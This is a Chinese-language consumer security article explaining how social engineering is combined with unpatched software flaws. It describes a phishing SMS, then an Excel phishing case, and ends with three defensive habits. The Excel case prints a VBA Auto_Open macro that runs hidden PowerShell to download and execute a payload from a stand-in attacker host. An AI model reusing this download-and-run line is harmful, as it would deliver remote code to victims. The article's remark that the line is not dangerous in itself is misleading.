上周朋友小林收到一条‘快递签收失败’短信,点开链接后手机立刻变卡,微信自动发了一堆乱码消息——不是中了病毒,而是被黑产用‘社工话术+旧版微信未修复的URL Scheme漏洞’绕过授权,直接调用了分享接口。
什么叫‘社工攻击结合漏洞’?
它不是单靠骗,也不是纯靠技术硬啃。是先用你熟悉的场景降低戒心(比如冒充IT部门让你‘重置密码’),再精准卡在你软件某个没打补丁的缺口上,一推就倒。就像拿一把仿制钥匙(社工话术)配一把真锁芯的裂缝(已知漏洞),门根本没机会反锁。
真实案例:Excel宏+钓鱼邮件=公司财务表秒丢
某外贸公司行政收到一封‘海关清关加急通知.xlsx’,发件人显示为合作货代。文件里藏了个启用宏的按钮,文字写着‘点击加载最新报关模板’。员工一点,宏代码就悄悄执行:
Sub Auto_Open()
Dim shell As Object
Set shell = CreateObject("WScript.Shell")
shell.Run "powershell -exec bypass -c ""IEX (New-Object Net.WebClient).DownloadString('http://attacker.site/payload.ps1')""", 0
End Sub这行代码本身不危险,但它依赖两个前提:一是用户手动启用了宏(社工说服你‘这是行业惯例’),二是电脑装的Office没更新到2023年9月之后的版本(CVE-2023-36884漏洞未修复)。缺一不可。
怎么防?三招落地见效
第一,给常用软件开‘自动更新’,但别信弹窗提示——微信、QQ、浏览器这些,进设置翻到底部找‘关于’,点进去看是不是最新版;别等弹窗说‘发现新版本’才点,有些恶意更新包就伪装成官方提示。
第二,所有‘要你输密码/点链接/开宏’的操作,先做‘5秒停顿’:合上笔记本,起身倒杯水,回来再问自己一句——‘这个需求,平时是谁负责?有没有打过电话确认?’很多社工链路,断在第三步。
第三,浏览器里输入网址时多敲一个字母:比如要上支付宝,别从短信链接跳,手动输 alipay.com;想查快递,打开菜鸟App而不是点‘物流异常’里的短链。短链背后可能是跳转到仿冒页,再触发Safari的Universal Links漏洞(iOS 15.4以下曾存在)。
安全不是守着一堆‘不能做’,而是清楚哪几个动作真正关键。把更新、停顿、手输这三件事变成肌肉记忆,比装十个杀毒软件都管用。